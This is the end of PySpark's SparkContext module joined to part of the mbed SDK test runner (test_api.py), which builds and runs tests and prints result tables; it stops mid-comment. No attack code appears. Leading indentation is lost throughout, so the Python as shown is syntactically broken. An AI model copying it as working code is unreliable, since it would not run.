L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
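        Illustrative usage (the path is an assumption; not executed as a doctest):
        >>> sc.addPyFile("/path/to/my_helpers.zip")  # doctest: +SKIP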
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
        >>> suppress = lock.acquire()
        >>> suppress = threading.Thread(target=start_job, args=(10,)).start()
        >>> suppress = threading.Thread(target=stop_job).start()
        >>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
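        For example, to assign jobs from this thread to a fair scheduler pool
        (illustrative; not executed as a doctest):
        >>> sc.setLocalProperty("spark.scheduler.pool", "pool1")  # doctest: +SKIP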
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
        Get a local property set in this thread, or None if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
from __future__ import print_function
import six
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
import functools
from colorama import Fore, Back, Style
from prettytable import PrettyTable, HEADER
from copy import copy, deepcopy
from time import sleep, time
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
from os.path import join, exists, basename, relpath, isdir, isfile
from threading import Thread, Lock
from multiprocessing import Pool, cpu_count
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.targets import TARGET_MAP, Target
from tools.config import Config
import tools.test_configs as TestConfig
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import get_config
from tools.resources import Resources, MbedIgnoreSet, IGNORE_FILENAME
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.options import extract_profile
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
from tools.notifier.mock import MockNotifier
from tools.notifier.term import TerminalNotifier
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
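    """ Watches a child process' stdout on a background thread, pushing each
        character read onto an internal queue for non-blocking consumption.
        Illustrative usage sketch (assumes `proc` is a subprocess.Popen created
        with stdout=PIPE):
            observer = ProcessObserver(proc)
            c = observer.queue.get()  # next character of the process output
            observer.stop()
    """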
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(self.single_test.generate_test_summary(test_summary,
shuffle_seed))
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
            # table shows a test x toolchain test result matrix
print(self.single_test.generate_test_summary_by_target(
test_summary, shuffle_seed))
print("Completed in %.2f sec"% (elapsed_time))
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
    TEST_LOOPS_LIST = [] # We redefine no. of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_parser=None,
_opts=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_parser = _parser
self.opts = _opts
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Target platform not found' %
(target)))
continue
clean_mbed_libs_options = (self.opts_goanna_for_mbed_sdk or
self.opts_clean or clean)
profile = extract_profile(self.opts_parser, self.opts, toolchain)
stats_depth = self.opts.stats_depth or 2
try:
build_mbed_libs_result = build_mbed_libs(
T, toolchain,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile,
notify=TerminalNotifier())
if not build_mbed_libs_result:
print(self.logger.log_line(
self.logger.LogType.NOTIF,
'Skipped tests for %s target. Toolchain %s is not '
'supported for this target'% (T.name, toolchain)))
continue
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building MBED libs for %s using %s'
% (target, toolchain)))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
                # Some libs, like RTOS or ETH, have to be compiled
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile,
notify=TerminalNotifier())
except ToolException:
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building library %s' % lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
                # TODO: move the two loops below to a separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(
test.source_dir, join(build_dir, test_id), T,
toolchain, test.dependencies, clean=clean_project_options,
name=project_name, macros=MACROS,
inc_dirs=INC_DIRS, jobs=self.opts_jobs, report=build_report,
properties=build_properties, project_id=test_id,
project_description=test.get_description(),
build_profile=profile, stats_depth=stats_depth,
notify=TerminalNotifier(),
)
except Exception as e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print(self.logger.log_line(
self.logger.LogType.ERROR,
'There were errors while building project %s' %
project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print(self.logger.log_line(
self.logger.LogType.INFO,
'Project %s is not supported' % project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id,
test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
                # For an automated test the duration acts as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
        # Generate a shuffle seed if one was not provided on the command line
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
            execute_threads = [] # Threads used to build the mbed SDK, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
            # Inside the execute_thread_slice() function, handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].items():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
                q.get() # wait for any thread to finish; t.join() would force waiting for threads in a fixed order
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].items():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names:
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if (self.opts_peripheral_by_names and test.peripherals and
not any((i in self.opts_peripheral_by_names)
for i in test.peripherals)):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Common test skipped for target %s' % target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral test skipped for target %s' % target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Non automated test skipped for target %s' % target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
                    # When users are using the 'build only' flag and the test does not have
                    # specified peripherals, we can allow building the test by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Peripheral %s test skipped for target %s' %
(",".join(test.peripherals), target)))
else:
print(self.logger.log_line(
self.logger.LogType.INFO,
'Test %s skipped for target %s' %
(test_id, target)))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
            table shows a test x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols, junction_char="|", hrules=HEADER)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
            table shows a target x test result matrix
"""
        success_code = 0 # Success code that can later be returned to the caller
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"], junction_char="|", hrules=HEADER)
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.items()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except ValueError:
continue
result[_test_id] = _test_loops
return result
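# Usage sketch (hypothetical values): the --loops option is parsed by
# argparse_many into a list before reaching this method, e.g.
#
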